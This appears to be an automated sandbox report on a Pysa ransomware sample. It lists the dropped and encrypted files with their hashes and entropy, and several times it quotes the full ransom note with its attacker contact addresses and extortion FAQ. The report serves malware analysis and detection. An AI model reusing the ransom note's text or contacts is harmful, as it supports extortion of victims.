                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\AdobeARM.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.363673808529789
                  Encrypted:false
                  SSDEEP:96:uCdVP/jUQ8neV4rBo1JxUk706bVMJtyYRDof82yKJFoJzIhyXRi/B49OKUkSMgHD:lPLUGV42fl06byrygY8Yo2Qhi/B49OKI
                  MD5:F88FB5B3E91C38D98FFBE8017438FD93
                  SHA1:93F4328E02E270208DDE6B8C36FA38A0894A4886
                  SHA-256:374EFC0B7153EAF7B4A669AB3D3296036D985B7EAA871C620BACF59220601B03
                  SHA-512:10BD8E245C78DECCF8DC808027FDFEE7EDAFA50123C2BE1099B61EFD9FEB6522F6492D819DBA66268B386CEDAF272112AF430B42EECDB1C4941988A34725DECB
                  Malicious:false
                  Preview: .r.`.8.m.,.`!y.S.(R..%.L]i..y".w@.`EJ$....3I...R|.c.x..}...."1...|:.....@...DJ....C.d..y..r....`0."..Q....$...zqI.k...U...[E.4z9....M..#..).Z./A.....B..E..........g......?aj...n..iv.|.'S..;........Q.O....W...i..T.......@3.....@..U..&.(....@.:.......`...x..Xa{T.l.."q._./.........4....Q....0..+Cm..](..%.<=..E..++...h.P.7.-<ma...}&..@.i..g.".......7w........C....S..)`....v.~...s..#...l...v......7.y7a...7.u...VL....2...X...7.C.v...$g.\.9H.......e....D.Ue.....Lem.P.=...8...!j.c.{2.p..rU......o>......!...Iw...f...}.......m......eU.F.>...H.k.iB.."f:......+H......5.g._.`.;^...@p.........%.J)........i.|-...Y).l.".y.....f..E....9....>*..T..w..4NB..}#hK...&..8..c.M.01A.G.I...eA..KGk.RJoK...U......z.u.*P...t."M...+.m5.-.+O.....`..SSR>...3.i...\.........V}<.P...E3.3...2NM..eYF&..TL8..MN.XxC:...&-.Y..<...VyW*C..m]={.. vQD#...T..K.p.vu......W......=H...K.Qk...%.T.h.Z.j.....%..nP..X..S.BI..z..q...0.r..C.d.^..x...W..Ck..&akq\./.u..(..9.!..R...,.K.
                  C:\Users\user\AppData\Local\Temp\ArmUI.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998191529620112
                  Encrypted:true
                  SSDEEP:6144:rgP+VSj9quFWTsaf6wbzc6bFlk9lpNNhH:rgO5TsafUGOzb
                  MD5:D547C10D83B86FE2BC1F283CBAEAA773
                  SHA1:F37E7B513AF6EE84A9065748321BFA8AD432E96C
                  SHA-256:D47EDEE80750F0E314420135620D5579EC53ABEEB219306FFD7823972D318400
                  SHA-512:D01E70ECC4D1BABF79C97F68C57C8312C1FF1419CAAC0EEA896AFDB75399D65D7726E8EB1AE1CEF22067D5D683B3BAE0A2338BB507CE082C0E1038409E8E11CA
                  Malicious:true
                  Preview: ....,n.`.P..s...A.8.......l._.......1.D..<_..,$....$....+..B.....:E.4J..V##.o9............p.f.".V.E,-....3..^...xw....gU.[.......)u..`.....I.z.2L...f.e.qb5!.&.f.....s.]`.].+t..%.w.l..O.Y.{...|.....:.......m.....q..+..Cn....H@..mJC8.0.....PBD..@D.#m.w./..H..S...y._.!.....(..j..e@.X@..<_8.ip.Ak<......X.b....RT7.".pm..W..w\.8........u..T.I..`.==...C........4..MCh>....O.......~......v...U....Tm..}..g...RC..!..]..J.z..l.....H.p; J&........@..Y..W...H.._..........p.M(...G./R.Uy..RV.bha....as..._..m)......../.h....%.......E.....4.=F.4.r(..a.q..C....1.n.}iRr..8..vwd..ki.D4".l.Q6....*..H.#.e....t...S.#..;..m...+.A;.....E....m..a.p\.XI<Z$8..]2...y...Si..*.b:B.q.i..c{....v.:5.....d.&/..F#.Q-.v7.~V.N..l.na..~..].e....b`Z..4.$M}X.......(.E.<.&...+..k.).#..0Y....u.Q.Oks}.H....}."H.<l..U9.b.`.Cb.C.....c.CaL.Tz..DOG.L...41......G..g.v..xZN....N.....e...v.b...L.O..no..Sw........R.>...]A.P..IHZ1..B|.9.B..R.......8.p4..aSe..x.C..T4$..D.}..... /S.....
                  C:\Users\user\AppData\Local\Temp\CR_8F2A8.tmp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\SetupExe(202007230953501D8).log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.998801738970454
                  Encrypted:true
                  SSDEEP:6144:RMH/hZysvxoc/lgSGpSTObgoSdAKLTwcNzG:RMfhosJrgSGpohLxLdNK
                  MD5:57FABC788176D36CF717204F754FA8CE
                  SHA1:26069FC09B3316A77B2B99DACB4924EFEBEB9D65
                  SHA-256:DBFF184A8FA60B0145B572FDA1A6BF144CFB3217CB6D7B81BB5F7BF52083BF81
                  SHA-512:A3CD18BC862F5D84D3F21B98382091DBFB21C0DDE77E182A1B3BDC36ED746ABA00A18A6E0B75E9F9CC51EC80F5DFF66205666409A201A68A08F407D783A31655
                  Malicious:true
                  Preview: .....a88V9.....O..3.H...s..(..h...w.0....F1wJJ*.<73>.<Q..M.9$........H...).~....N.>.Y8...T(.<..h..+....%&@f..;.N..r.GJKk. G..e..zDhP.....=k;.....A.....F...)..`J......q.S....!........A....c...k*RD*...;...y..l....y...r.Y..9<;.~(.J.:.c.....V-l..,q...0...W[.."...^.........9.GU...)[.>U......k.(..ah. .D.A....2.e...m.~m....y....x.lie.|V..'.w*.@...F>M.......=CQ...7..?*.2.W!.c.To.x/.LT...0.0.uG.b..Nn.Yp.H...m.uE.>YVE.M.Mo|...q-O`.j7S........#.,,..x.]a.SGI@.C....0]~G4..#=. .^*......X*.a.....>. ....5....=+....+D.z......Ec.$...6j.].]:^-r%...h.Re.....*.......x.N.=.....J..Y.r...>.{w...Y.>..6.......]u..#...uP\.L. .?2..~}.S.....A&\d.t...'}...q..s}.WL................o.+........=.Q.N..g...P......".....;i....Z.*.1...w.w?.E.U..`...E7+..,h..%..2$ce..e.urg.4...5..O.@s.iw..A.......r....#;n.%....B....N..'q.um..a.L.A..e......NgQ.>!j...%....h4.....X..I.<9.u6(......S..g.jX.<E.Wj.r$...v.*P..]..Wc....T......EU.=...>...o..n...;#...p.\..Y\...k.J.7.p...Q(....K..}~..
                  C:\Users\user\AppData\Local\Temp\acrocef_low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\acrord32_sbx\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Temp\chrome_installer.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22528
                  Entropy (8bit):7.929411361538718
                  Encrypted:false
                  SSDEEP:384:39umcp8vqSGGs98apeRe/11nwM/mSQs/z5RHeqkNyNcY0WEwP3SHjR:RRR3Ve/11wM/x5/z5RH3k4NPOw0jR
                  MD5:0F3DF96C3DA47D23AC6CEB72905AB891
                  SHA1:48FDE9AA089662E5D51F4B15B3B352646C00E3E8
                  SHA-256:C2785C0F67C321C7343A7C1102EFE229B4390590068C4BC92133A5BC7B8707DD
                  SHA-512:874D2D51004D1FCDD56FBB755EABA9E2D63D403FC61603CADC036AD85E104B5737E05BD9FF4C1379C4EEF74410FFE1B146E264EA3E3F74F3C7909645E2FCF129
                  Malicious:false
                  Preview: E.....pHq.<."..%j..Z-6.A:..&.Rq...V.]a.=...L*^ ..2Z.^F..X...~9FN#.[X..p`c..~.......8...F....F....'N......l.%..K.. :.............E-Ua..Fv...k.~...]$L....h..zv..8...`..=...6...........!.p.M...Vv...+v......{..".6/..y....?VF?.P5...C..:.........c.v?.O._)..Ia..?...p`.....?.`e.Jd........ .6{bMu.yLT......,...r{.W..d.b}s8.-.o..5...m.1.p.P.&.@.6.ZS....4....|.W..jb.x.IXm.>.:......D....Bz;M.].t...].......$...........?*7)...O...d..K.E\....3)vK..)..2...,r...<.+....TV..xkO....%.........*..">...O1..7..dr...{0F..E.T...qm....F.....M\.VIV0$.H...L5gAz..;.)$.=.p\.o*.....*.}...R.......7.."%.r.K.........1.......{... .+...,c.N..._ux5..N./M....A....(T..:mQ.w^......$...3..M...o........v\0....C...`H.U..1......to=....a....6_.e.}g.....s.<h.z...(......L.El. .!A.q6PI.7.2j..D.......(.}....i...IkX.....!.?...0.../...5.%..(TC.....pev.ui+......e.......^e..TQ.....G.5=.c..1;.}.......>_Uh.h.?.l(.!%......$h.....l..}Q..N.@.P..[R>.i.a._x......W..\.#..,.8..hW:....U|.I<....M...y
                  C:\Users\user\AppData\Local\Temp\van1qgiu.sdl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\VirtualStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\Desktop\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04499933192959
                  Encrypted:false
                  SSDEEP:48:rADRD60HiG3mFO9ZjYRruZFiS7+I1rzmcNl3TuABWb+jg1qPAGKWZcbd9cykA9AJ:cRDnHV3mOZ0d2FiSDrzmcrnPjg1a57cK
                  MD5:8EF7AA016873C5EE0A1E4C97FA44C191
                  SHA1:E848804FB97847C5863DBF649322D5613DB1BBCF
                  SHA-256:64AB3E9089937E9E43CE90100DB60855D5A10AB72F872773756DD6017A03B885
                  SHA-512:C1B355FC4A7D2161398D64DB98DD05339BECE77E7B9AFE2980ACAEBC6B8A07765B3E2B158543B6A1D84C0080FDADA0AF140B7BACA065582EC8423BD7133EC96E
                  Malicious:false
                  Preview: .!..$.V(K.......{|0F.Pw.....c..w*'.A...9...6.X+.a........xE...,.C.7.......8O...(Xu.L....QX.....=n.nEP.2~C...)0.....C...9...0..C....$..._. .;;......3.?.@...,.f...l....X...a#..T.J..i0,.~vk......i.s.DH....N.....,...Lu..9.oh$ .-....`..=$b..03.C.P.}b*}.)c.].."...7}...e....<....<~.%..Q./.l.......R.(...%.f.....S..Y...Hh.z.6..y.?.DQ..?}.+..=-|.M.".`....=">O.1....w..Kh+.....q....>..6..S.........u`.D...C^.....q{..AG4.w....L....>oa.Z...q?P+2y...8....o./.:.......LVY.F....rd....7.....u..8..{,,9q..... .De...].%.C...Z..Y...llv.z.-W....R..Z.c$}(1..%..*.....L,Z...`..Z...}...8p:-Mc.Az...G.~..<.....]d.gT....t.es..&.{l....5...^..-......3.....U..mx..z.e..]..G.Z./.Y.....J..,...MP..U.$.~....Y.3.....}.o%v..qi...1.....)W....).?.>u....r.P.....}$......(...7<..F.$.......A........:.j.x..$7.WH.d.@>f..@...JV,.~...1L.....]2...2C.h[..U...cu.....)c...?|..._..8.I..h.II....J&.3...$.pN....\..4.............t......j..9.|.b.:.C.....A.~..\...0...Ds.....B.B..)...........o.F.....
                  C:\Users\user\Desktop\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.077767880717833
                  Encrypted:false
                  SSDEEP:48:4lAHfEZ0IxZ+bfrfWl2E3sUG7KQPtYRm8fgQ+w0MejAAME8UxjFsKlIVauKXuMZc:R/65ubjNKsjr+Rvgpw7ejAxE8IjFsr7f
                  MD5:EE1E9105BAF9E78C30525D243983B7AD
                  SHA1:72BDE3B90D798A4EB338F34582ED363D3684AECE
                  SHA-256:D5B6C806B9E82D73021061719C19D200DFC58ED00FFC7E24BA06A05E544196BE
                  SHA-512:724192C103C9079F40A40723CE88176D3467698DBB384AE891847C564DBFEA01E543BFDF1E11971C1AB854BCE2B969A2A79870C9B091F2AE9FCD4D04C75E6D2E
                  Malicious:false
                  Preview: ...|.p1.m..XN</.o.>..a.d..W.M..jY..(=4.db....5..........\#.".._..w...v[..i/.l.0....$Z.HWlf%....1.}].y...2K*.4.Q.......\!.A.n@7..m.n.;.<.N....#P..G......;S.Rd..F...FO(.HU.^..O..h.-......-.m.....}.X0...q....MC..z....Y/n..@.:...o...../?u.t.T..8.6~`..<....N...q...t@./.'.@.Z."N..O...p3..Q+.......ll.'.,.R.K.`......<.<..N..z|v...v..%...d..2. .~s.Flr......H..v.....Bx..IZX.....jk...`..p..Uz....9;.f._~yt;k..^..........).P.W0..m...t..._....v.q........2......W...C....G.r..d.y...c.T.R..63.'eC.....f.*..6+.u.QG.(."1..g......UWB...Xg..%..2q.25.$GV...k./.0^....{kt.n.=0.=.......L.h.)...A....o..Q..o.e..(i..5XxJ...e....LH.....+....WZGM.....Z^. ..."=b..YS^......2:.........].-%........D-.4:..1.....u{\[*...;IQ......9.l.I.uy........i7.....;...P.m..F.w...6N.P.<..2..".H.....u..6.....rt....^!..?.../J...O$....}..l\.-...[...ZF.}..T.SW.TD"...z....`....q........N........d......[.....].dz...(.qf...'.;..Z.2....z..5..+7.P.-....rg...9..yP....<....m..+i......`.)pl.b...S.
                  C:\Users\user\Desktop\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.037705391715133
                  Encrypted:false
                  SSDEEP:48:dg77CkbLmRma6sQPbMNxfURHcZBWRr1QtY9GIh6ntBnsQT0xtQfWNXmb3:doCkORgUURHcZBWRr1QsenLsQsZx+3
                  MD5:187A70EC8DD05A0283AE093A186D747B
                  SHA1:E53E46164E42AF6CBDD653D9002E184BE389E225
                  SHA-256:4D23C0DC06150BE64D4605DFF40C91445A516533F88E5BD9CF9C9B3F35DA4A03
                  SHA-512:C2AE8F78EBC290D957C3131874F14AB6D2B4ED471CB04DFC9034CCB213824320A222890E03234DC26CC00437A230D25564C569610139C2B1BE16E7B021AC0A4B
                  Malicious:false
                  Preview: wx.[){.tm.r..j.Y...9l..I......%m..A.^.|>..9.>J...E....p...Is....&.s..Wg.A".N.EO..3,&'v....7n....l...^.....O......i=..I...@U..%..0..8@....U...xy)..MZ....3.DE..Z...0..<..HU[_....c5....f.}O.n.-...P.bz.X.i.3..a.[..i..rh...(..jk..K.W.F6..W..Q..q...25...|I...R..m...A2q%.s..KNew....3.)S}>.iv]..+.~...........?.u......IL...y..F.N.?-1.|....j.t.^.l#.e.~.?{c....{"....9...Z.....TRlz8...W..^..J.+.../E.d..Y....m..vME.).Y'adA..w.@..}._.O@>...3...)H.[..~f..`;....y..].1.../.X8.....*M.Ko.I........C...u.;.F.H5.5.p...I$;..N../I..VP.D{..z#/...@.....x49.U..n.........2.>. ....@.....7z..%{...a.,^{)._...t....f.dL.9..`.....1.A<l.|...[8;."B...2.t...Y.iH.k.n..7...........V.O..7......9....fE^.`...@....}L`(..v&.d............d....v).xBO.m5tP(5Fyf..TUb.IKm.w..HQ..U..s...I.E.|.<F....$QY%ZC.D&.d.l.s..XN.qqd...D.!.h5U.P..<a.....[........I=<4...QC..............(....n;.6~-|..'.M....Tf].`.,]x.6..L.t.....'WI.N-..nJ..Xu...z.5P..$......L].......<.<.).L..U..N..sfd/P.Q..E5
                  C:\Users\user\Desktop\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.037414821584597
                  Encrypted:false
                  SSDEEP:48:MDuce7GT9NVVb+kbKq0GhMVsKGHjzeAuh3DiedaGruSfQdp0UbpUw5RIgwjjiyRw:MuNiT9NVMkOqvzHWAUHd6yixIgshRBwZ
                  MD5:CEA4AF32F9DE1BCC0F1883C8EF9FDD9A
                  SHA1:C7AA3C6A9C01E9A92BE07A0C3E85E43E937A71E5
                  SHA-256:64A920641A8BE2CFC35AE9EFAC1BD5465D4A5C9A81897FD1FE8794B63E3A31B5
                  SHA-512:B0D1A8C21A2606367B2BA111F8B4C82AE75BC7021DE2D8410A4EB55E310AAF36B785CFAD9C2D16A21CF386B2CC2C95B9559A064AB056CA04C6036B46BAD8C0D9
                  Malicious:false
                  Preview: ~..[!..m7..B.}.+d_...iT.4J.+....%....t.,.w.5Q..G....%.b..1. .i...Q~......M....SJ'.AohS..?..1..7.>.V[7.C,.^.kH.Co..)[1..$^~...g...........(.]........L.....T.v......W..$...w..4..QU..'...em.v3.....L.....i4N.......6.{....*})[m..y^f.6.ki.t..x.%..G.v..2.D.z*m.5.o6..S.f)=..v..b!CR.IL.... .n....C....3h.\..ei.0...EL...!.D8.*. .gZ....\.Ig.O...>iy.H.......s...73f.`..Jn.9.+P....S.......i0R.Wj_r...mf..-.b..&H"......u~\yf,..A..g.:b{.h.Sb1.L......S..@{..w!Ch%.l..U..8u..r....z..;...h.r0./.`.B..........l.u.W.&..F.......?v......2..\P......n.....7.lv.....6h..c.sCB62o.z.?..](..!...K......3......T.[q@...JtX.vN..4...].`>.n}....?h..........<.~.i......D.........Ii/.3....7z......pl.......Y.!..g:cp.L;w..x]Z.I_...Z..}g".F.>.3..b..d..-..m..y../P.\..(..g...z...%.$.g$.Q......>....V.d.\...0.Z5..gm.lR..........i..+E..5KB..x.....0...{N~..0..y.Go...F...O0.`..Ep..(.a.C..y...1"...d4]9:X.(...hII.....Ia_Q....Z..v...4..j.o_../..U...]+.)bN..1....2...9..W.#...@..v1v...h...9..
                  C:\Users\user\Desktop\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.068179558621237
                  Encrypted:false
                  SSDEEP:48:mdMDT21dKz/xQpXnMzMceXurVlaVH+T4IWrnvYq52xd9DDazsl4mgDzSzeSHTHD1:BPswxYBx+xokUIkvYqkxLDks2mgDzwH9
                  MD5:6FC6EBCB67A401372AD70261A3DF6F64
                  SHA1:F4F46C405B0B76884075E43D20D3DE6052A03AFE
